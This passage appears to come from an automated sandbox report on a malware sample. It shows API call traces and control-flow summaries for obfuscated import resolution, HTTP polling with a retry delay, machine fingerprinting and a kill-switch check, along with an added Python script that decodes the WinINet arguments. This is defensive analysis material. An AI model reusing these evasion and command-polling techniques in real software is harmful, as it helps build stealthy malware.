                              • LoadLibraryA.KERNEL32(00FFD068,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A04E
                              • LoadLibraryA.KERNEL32(00FFD0E0,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A060
                              • LoadLibraryA.KERNEL32(00FFCF60,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A072
                              • LoadLibraryA.KERNEL32(00FFD080,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A083
                              • LoadLibraryA.KERNEL32(00FFCFF0,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A095
                              • LoadLibraryA.KERNEL32(00FFCE58,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A0A7
                              • LoadLibraryA.KERNEL32(00FFCE70,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A0B8
                              • GetProcAddress.KERNEL32(75290000,00FE57D0), ref: 0013A0DA
                              • GetProcAddress.KERNEL32(75290000,00FFCE88), ref: 0013A0F2
                              • GetProcAddress.KERNEL32(75290000,00FF9148), ref: 0013A10A
                              • GetProcAddress.KERNEL32(75290000,00FFCE10), ref: 0013A123
                              • GetProcAddress.KERNEL32(75290000,00FE56D0), ref: 0013A13B
                              • GetProcAddress.KERNEL32(6FC70000,00FEB9A0), ref: 0013A160
                              • GetProcAddress.KERNEL32(6FC70000,00FE5910), ref: 0013A179
                              • GetProcAddress.KERNEL32(6FC70000,00FEB6D0), ref: 0013A191
                              • GetProcAddress.KERNEL32(6FC70000,00FFCEA0), ref: 0013A1A9
                              • GetProcAddress.KERNEL32(6FC70000,00FFCF18), ref: 0013A1C2
                              • GetProcAddress.KERNEL32(6FC70000,00FE5A50), ref: 0013A1DA
                              • GetProcAddress.KERNEL32(6FC70000,00FE5930), ref: 0013A1F2
                              • GetProcAddress.KERNEL32(6FC70000,00FFCF78), ref: 0013A20B
                              • GetProcAddress.KERNEL32(752C0000,00FE5850), ref: 0013A22C
                              • GetProcAddress.KERNEL32(752C0000,00FE58D0), ref: 0013A244
                              • GetProcAddress.KERNEL32(752C0000,00FFD020), ref: 0013A25D
                              • GetProcAddress.KERNEL32(752C0000,00FFCED0), ref: 0013A275
                              • GetProcAddress.KERNEL32(752C0000,00FE5790), ref: 0013A28D
                              • GetProcAddress.KERNEL32(74EC0000,00FEB630), ref: 0013A2B3
                              • GetProcAddress.KERNEL32(74EC0000,00FEBA18), ref: 0013A2CB
                              • GetProcAddress.KERNEL32(74EC0000,00FFCE28), ref: 0013A2E3
                              • GetProcAddress.KERNEL32(74EC0000,00FE56F0), ref: 0013A2FC
                              • GetProcAddress.KERNEL32(74EC0000,00FE59D0), ref: 0013A314
                              • GetProcAddress.KERNEL32(74EC0000,00FEB658), ref: 0013A32C
                              • GetProcAddress.KERNEL32(75BD0000,00FFD0B0), ref: 0013A352
                              • GetProcAddress.KERNEL32(75BD0000,00FE58F0), ref: 0013A36A
                              • GetProcAddress.KERNEL32(75BD0000,00FF92C8), ref: 0013A382
                              • GetProcAddress.KERNEL32(75BD0000,00FFCEB8), ref: 0013A39B
                              • GetProcAddress.KERNEL32(75BD0000,00FFCF30), ref: 0013A3B3
                              • GetProcAddress.KERNEL32(75BD0000,00FE5A10), ref: 0013A3CB
                              • GetProcAddress.KERNEL32(75BD0000,00FE56B0), ref: 0013A3E4
                              • GetProcAddress.KERNEL32(75BD0000,00FFD0C8), ref: 0013A3FC
                              • GetProcAddress.KERNEL32(75BD0000,00FFCEE8), ref: 0013A414
                              • GetProcAddress.KERNEL32(75A70000,00FE5990), ref: 0013A436
                              • GetProcAddress.KERNEL32(75A70000,00FFCF90), ref: 0013A44E
                              • GetProcAddress.KERNEL32(75A70000,00FFCF00), ref: 0013A466
                              • GetProcAddress.KERNEL32(75A70000,00FFCF48), ref: 0013A47F
                              • GetProcAddress.KERNEL32(75A70000,00FFCFA8), ref: 0013A497
                              • GetProcAddress.KERNEL32(75450000,00FE57B0), ref: 0013A4B8
                              • GetProcAddress.KERNEL32(75450000,00FE5830), ref: 0013A4D1
                              • GetProcAddress.KERNEL32(75DA0000,00FE5710), ref: 0013A4F2
                              • GetProcAddress.KERNEL32(75DA0000,00FFCFC0), ref: 0013A50A
                              • GetProcAddress.KERNEL32(6F070000,00FE5A30), ref: 0013A530
                              • GetProcAddress.KERNEL32(6F070000,00FE57F0), ref: 0013A548
                              • GetProcAddress.KERNEL32(6F070000,00FE5870), ref: 0013A560
                              • GetProcAddress.KERNEL32(6F070000,00FFD008), ref: 0013A579
                              • GetProcAddress.KERNEL32(6F070000,00FE5890), ref: 0013A591
                              • GetProcAddress.KERNEL32(6F070000,00FE5750), ref: 0013A5A9
                              • GetProcAddress.KERNEL32(6F070000,00FE5A90), ref: 0013A5C2
                              • GetProcAddress.KERNEL32(6F070000,00FE5970), ref: 0013A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0013A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0013A607
                              • GetProcAddress.KERNEL32(75AF0000,00FFD1D0), ref: 0013A629
                              • GetProcAddress.KERNEL32(75AF0000,00FF91D8), ref: 0013A641
                              • GetProcAddress.KERNEL32(75AF0000,00FFD1B8), ref: 0013A659
                              • GetProcAddress.KERNEL32(75AF0000,00FFD1E8), ref: 0013A672
                              • GetProcAddress.KERNEL32(75D90000,00FE5730), ref: 0013A693
                              • GetProcAddress.KERNEL32(6F9D0000,00FFD158), ref: 0013A6B4
                              • GetProcAddress.KERNEL32(6F9D0000,00FE5770), ref: 0013A6CD
                              • GetProcAddress.KERNEL32(6F9D0000,00FFD170), ref: 0013A6E5
                              • GetProcAddress.KERNEL32(6F9D0000,00FFD278), ref: 0013A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 89c9571a49e654c4c9148cbe82949f878ee1c2344cdb80c2e450651272d2548c
                              • Instruction ID: f966cc1715ca65d98ec3c341401500f59527f4ea1f0bbadd286552633468512a
                              • Opcode Fuzzy Hash: 89c9571a49e654c4c9148cbe82949f878ee1c2344cdb80c2e450651272d2548c
                              • Instruction Fuzzy Hash: 73622EB5500A00AFC346DFA9EE989563BFDF78C301F14C51AE605E3264D7B9A841EF62

                               Control-flow Graph (rendered graph not preserved in this extraction; legend: Executed / Not Executed)
                               Basic blocks listed as "node: address range, calls -> successor nodes":
                               • 1033: 126280-12630b call 13a7a0, call 1247b0, call 13a740, InternetOpenA, StrCmpCA -> 1040, 1041
                               • 1040: 126314-126318 -> 1042, 1043
                               • 1041: 12630d -> 1040
                               • 1042: 126509-126525 call 13a7a0, call 13a800 * 2 -> 1062
                               • 1043: 12631e-126342 InternetConnectA -> 1045, 1046
                               • 1045: 126348-12634c -> 1047, 1048
                               • 1046: 1264ff-126503 InternetCloseHandle -> 1042
                               • 1047: 12635a -> 1050
                               • 1048: 12634e-126358 -> 1050
                               • 1050: 126364-126392 HttpOpenRequestA -> 1052, 1053
                               • 1052: 1264f5-1264f9 InternetCloseHandle -> 1046
                               • 1053: 126398-12639c -> 1055, 1056
                               • 1055: 1263c5-126405 HttpSendRequestA, HttpQueryInfoA -> 1058, 1059
                               • 1056: 12639e-1263bf InternetSetOptionA -> 1055
                               • 1058: 126407-126427 call 13a740, call 13a800 * 2 -> 1062
                               • 1059: 12642c-12644b call 138940 -> 1066, 1067
                               • 1062: 126528-12652d
                               • 1066: 1264c9-1264e9 call 13a740, call 13a800 * 2 -> 1062
                               • 1067: 12644d-126454 -> 1069, 1070
                               • 1069: 126456-126480 InternetReadFile -> 1073, 1074
                               • 1070: 1264c7-1264ef InternetCloseHandle -> 1052
                               • 1073: 126482-126489 -> 1074, 1078
                               • 1074: 12648b -> 1070
                               • 1078: 12648d-1264c5 call 13a9b0, call 13a8a0, call 13a800 -> 1069
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00126385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001263FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0012646D
                              • InternetCloseHandle.WININET(00000000), ref: 001264EF
                              • InternetCloseHandle.WININET(00000000), ref: 001264F9
                              • InternetCloseHandle.WININET(00000000), ref: 00126503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                               • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 28722d2669630939da20bcedb77d8bf832c337a19bb2c2cb350ccffaab6dcdd1
                              • Instruction ID: 47ccd8982b4da7e415ebeebf9ac52c2e3a467d2e2e02317b5b58694984c2cfc7
                              • Opcode Fuzzy Hash: 28722d2669630939da20bcedb77d8bf832c337a19bb2c2cb350ccffaab6dcdd1
                              • Instruction Fuzzy Hash: FB714C71A00218ABDB24EFA0DC59FEE77B8BF44700F508198F10A6B1D0DBB46A85CF52
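                               The two function listings above (the import resolver at 00139C10 and the HTTP GET routine at 00126280) are more useful once the raw DWORD arguments are read back as Windows SDK names. The script below is an added example written for this report; it is neither Joe Sandbox code nor the sample's own logic. It parses trace lines in the "Api.MODULE(args), ref: ADDR" form that this report uses (an excerpt of the lines above is embedded as sample input), maps the WinINet constants using the values from wininet.h, and, for the resolver, counts GetProcAddress calls per module handle while separating export names passed as plaintext from names passed as pointers into a runtime buffer. In this trace only InternetSetOptionA and HttpQueryInfoA appear as plaintext; every other name is a pointer in the 00FE0000-00FFFFFF range, so those imports will not show up in the PE's import table. The module handles (74DD0000 and so on) are left as numbers because the report does not name the DLLs behind them.

```python
import re
from collections import Counter

# Constants are the Windows SDK (wininet.h) values. The trace lines further down
# are an excerpt copied from the API lists in this report, not the complete trace.
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {19: "HTTP_QUERY_STATUS_CODE"}

CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-F]{8})")
HEX_RE = re.compile(r"[0-9A-F]{8}")


def parse_call(line):
    """Turn 'Api.MODULE(a,b,...), ref: ADDR' into a dict. 8-digit hex args become
    ints; '?' (value not captured by the sandbox) and literal strings stay as text."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = [int(a, 16) if HEX_RE.fullmatch(a) else a for a in m.group(3).split(",")]
    return {"api": m.group(1), "module": m.group(2), "args": args,
            "ref": int(m.group(4), 16), "subcall": "Part of subcall" in line}


def flag_names(value, table):
    """Split a DWORD into known flag names (highest bit first); leftover bits stay hex."""
    known = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    return known + ([hex(rest)] if rest else [])


def decode_wininet(call):
    """Map the numeric arguments of one WinINet call to their SDK names."""
    api, a = call["api"], call["args"]
    if api == "InternetOpenA":            # (agent, access_type, proxy, bypass, flags)
        return {"access": INTERNET_OPEN_TYPE.get(a[1], hex(a[1]))}
    if api == "InternetConnectA":         # (h, server, port, user, pass, service, flags, ctx)
        port = "not captured" if a[2] == "?" else ("default" if a[2] == 0 else a[2])
        return {"port": port, "service": INTERNET_SERVICE.get(a[5], hex(a[5]))}
    if api == "HttpOpenRequestA":         # (h, verb, object, version, referrer, accept, flags, ctx)
        return {"verb": a[1], "flags": flag_names(a[6], INTERNET_FLAGS)}
    if api == "InternetSetOptionA":       # (h, option, buffer, length)
        return {"option": INTERNET_OPTION.get(a[1], hex(a[1])), "length": a[3],
                "value": "not captured" if a[2] == "?" else a[2]}
    if api == "HttpQueryInfoA":           # (h, info_level, buffer, buflen, index)
        return {"level": HTTP_QUERY.get(a[1], hex(a[1]))}
    if api == "InternetReadFile":         # (h, buffer, bytes_to_read, bytes_read)
        return {"chunk": a[2]}
    return {}


def describe_request(lines):
    """Decode one function's WinINet calls, keyed by API name, first occurrence wins."""
    out = {}
    for c in filter(None, map(parse_call, lines)):
        if not c["subcall"] and c["module"] == "WININET":
            out.setdefault(c["api"], decode_wininet(c))
    return out


def summarize_imports(lines):
    """Count GetProcAddress per module handle and split literal export names from
    names passed as pointers into a runtime-built buffer (what decrypted strings look like)."""
    per_module, literal, pointer, loads = Counter(), [], 0, 0
    for c in filter(None, map(parse_call, lines)):
        if c["api"] == "GetProcAddress":
            per_module[c["args"][0]] += 1
            if isinstance(c["args"][1], int):
                pointer += 1
            else:
                literal.append(c["args"][1])
        elif c["api"] == "LoadLibraryA":
            loads += 1
    return {"per_module": per_module, "literal": literal, "pointer": pointer, "loads": loads}


HTTP_TRACE = [  # excerpt of the listing for the function at 00126280
    "InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1",
    "InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335",
    "HttpOpenRequestA.WININET(00000000,GET,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00126385",
    "InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF",
    "HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001263FD",
    "InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0012646D",
]
IMPORT_TRACE = [  # excerpt of the listing for the resolver at 00139C10
    "GetProcAddress.KERNEL32(74DD0000,00FE5B70), ref: 00139C2D",
    "GetProcAddress.KERNEL32(74DD0000,00FE5BB0), ref: 00139C45",
    "LoadLibraryA.KERNEL32(00FFCE40,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A03D",
    "GetProcAddress.KERNEL32(75290000,00FE57D0), ref: 0013A0DA",
    "GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0013A5F1",
    "GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0013A607",
]

if __name__ == "__main__":
    for api, info in describe_request(HTTP_TRACE).items():
        print(f"{api:20s} {info}")
    print(summarize_imports(IMPORT_TRACE))
```

                               Run against the excerpt, the decoder reads the GET routine as: direct (non-proxied) access, INTERNET_SERVICE_HTTP on the default port, a GET opened with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, a 4-byte INTERNET_OPTION_SECURITY_FLAGS write before HttpSendRequestA (the flag value itself is "?" in the trace, so the script reports it as not captured rather than guessing), an HTTP_QUERY_STATUS_CODE check, and InternetReadFile in 0x7CF (1999) byte chunks. Paste the full API list of either function into the lists to get the complete picture.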

                               Control-flow Graph (rendered graph not preserved in this extraction; legend: Executed / Not Executed)
                               Basic blocks listed as "node: address range, calls -> successor nodes":
                               • 1090: 135510-135577 call 135ad0, call 13a820 * 3, call 13a740 * 4 -> 1106
                               • 1106: 13557c-135583 -> 1107, 1108
                               • 1107: 1355d7-13564c call 13a740 * 2, call 121590, call 1352c0, call 13a8a0, call 13a800, call 13aad0, StrCmpCA -> 1134, 1138
                               • 1108: 135585-1355b6 call 13a820, call 13a7a0, call 121590, call 1351f0 -> 1124
                               • 1124: 1355bb-1355d2 call 13a8a0, call 13a800 -> 1134
                               • 1134: 135693-1356a9 call 13aad0, StrCmpCA -> 1139, 1140
                               • 1138: 13564e-13568e call 13a7a0, call 121590, call 1351f0, call 13a8a0, call 13a800 -> 1134
                               • 1139: 1356af-1356b6 -> 1143, 1144
                               • 1140: 1357dc-135844 call 13a8a0, call 13a820 * 2, call 121670, call 13a800 * 4, call 136560, call 121550 -> 1270
                               • 1143: 1357da-13585f call 13aad0, StrCmpCA -> 1163, 1164
                               • 1144: 1356bc-1356c3 -> 1148, 1149
                               • 1148: 1356c5-135719 call 13a820, call 13a7a0, call 121590, call 1351f0, call 13a8a0, call 13a800 -> 1143
                               • 1149: 13571e-135793 call 13a740 * 2, call 121590, call 1352c0, call 13a8a0, call 13a800, call 13aad0, StrCmpCA -> 1143, 1249
                               • 1163: 135991-1359f9 call 13a8a0, call 13a820 * 2, call 121670, call 13a800 * 4, call 136560, call 121550 -> 1270
                               • 1164: 135865-13586c -> 1170, 1171
                               • 1170: 135872-135879 -> 1178, 1179
                               • 1171: 13598f-135a14 call 13aad0, StrCmpCA -> 1199, 1200
                               • 1178: 1358d3-135948 call 13a740 * 2, call 121590, call 1352c0, call 13a8a0, call 13a800, call 13aad0, StrCmpCA -> 1171, 1275
                               • 1179: 13587b-1358ce call 13a820, call 13a7a0, call 121590, call 1351f0, call 13a8a0, call 13a800 -> 1171
                               • 1199: 135a16-135a21 Sleep -> 1106 (back-edge: the retry loop re-enters at 1106 after the Sleep)
                               • 1200: 135a28-135a91 call 13a8a0, call 13a820 * 2, call 121670, call 13a800 * 4, call 136560, call 121550 -> 1270
                               • 1249: 135795-1357d5 call 13a7a0, call 121590, call 1351f0, call 13a8a0, call 13a800 -> 1143
                               • 1270: 135ac3-135ac6
                               • 1275: 13594a-13598a call 13a7a0, call 121590, call 1351f0, call 13a8a0, call 13a800 -> 1171
                              APIs
                                • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                                • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001356A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135857
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 001352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                                • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 0013532F
                                • Part of subcall function 001352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                                • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 00135383
                                • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 001353AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0013578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00135A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 3e830f7dcdc878cd96d82759de47098a3a68cf50f4b70a0afcd2d0ae310a3260
                              • Instruction ID: 787898088135a3db7e1750242254ba1695c8743b4c7786d93a6bfaaa8d38b919
                              • Opcode Fuzzy Hash: 3e830f7dcdc878cd96d82759de47098a3a68cf50f4b70a0afcd2d0ae310a3260
                              • Instruction Fuzzy Hash: B6E15F72910504AADB09FBA0EC92AED737DAF74300F908168F54767191EF746B09CBA2

                              Control-flow Graph

                              • Graph rendering omitted: function 001317A0 (blocks 1317a0-1319cd) performs a StrCmpCA at entry whose failing path calls ExitProcess, followed by a chain of further StrCmpCA comparisons
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001317C5
                              • ExitProcess.KERNEL32 ref: 001317D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 8cb73197a75ecfe531fef55ce9e6fa574f7160cceff1cc1321d1542a0296b1c4
                              • Instruction ID: 673316d5389f6d2599226b072758631f1c08e7d8e4377ff695e18a87fb760fda
                              • Opcode Fuzzy Hash: 8cb73197a75ecfe531fef55ce9e6fa574f7160cceff1cc1321d1542a0296b1c4
                              • Instruction Fuzzy Hash: 90517CB4A0420AFFCB05DFA5D954FBE77BABF44708F108048E906A7251D770E955CB62

                              Control-flow Graph

                              • Graph rendering omitted: function 00137500 (blocks 137500-13768e) calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00137542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0013760A
                              • wsprintfA.USER32 ref: 00137640
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 46aac63e56c3fe17d35cc860767307d687531225c244122bcce7d8c8e58a2fc5
                              • Instruction ID: ede9c1bf8640516abd16cb24e6c92e60d151b00b0f62aea76d668c7d3c25f21b
                              • Opcode Fuzzy Hash: 46aac63e56c3fe17d35cc860767307d687531225c244122bcce7d8c8e58a2fc5
                              • Instruction Fuzzy Hash: 904180F1D04248ABDB25DF94DC85BEEBBB8AF18700F104199F509B7280DB75AA44CFA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2488), ref: 001398A1
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2308), ref: 001398BA
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2470), ref: 001398D2
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2320), ref: 001398EA
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2500), ref: 00139903
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF9128), ref: 0013991B
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FE5E10), ref: 00139933
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FE5D90), ref: 0013994C
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2218), ref: 00139964
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2230), ref: 0013997C
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2338), ref: 00139995
                                • Part of subcall function 00139860: GetProcAddress.KERNEL32(74DD0000,00FF2380), ref: 001399AD
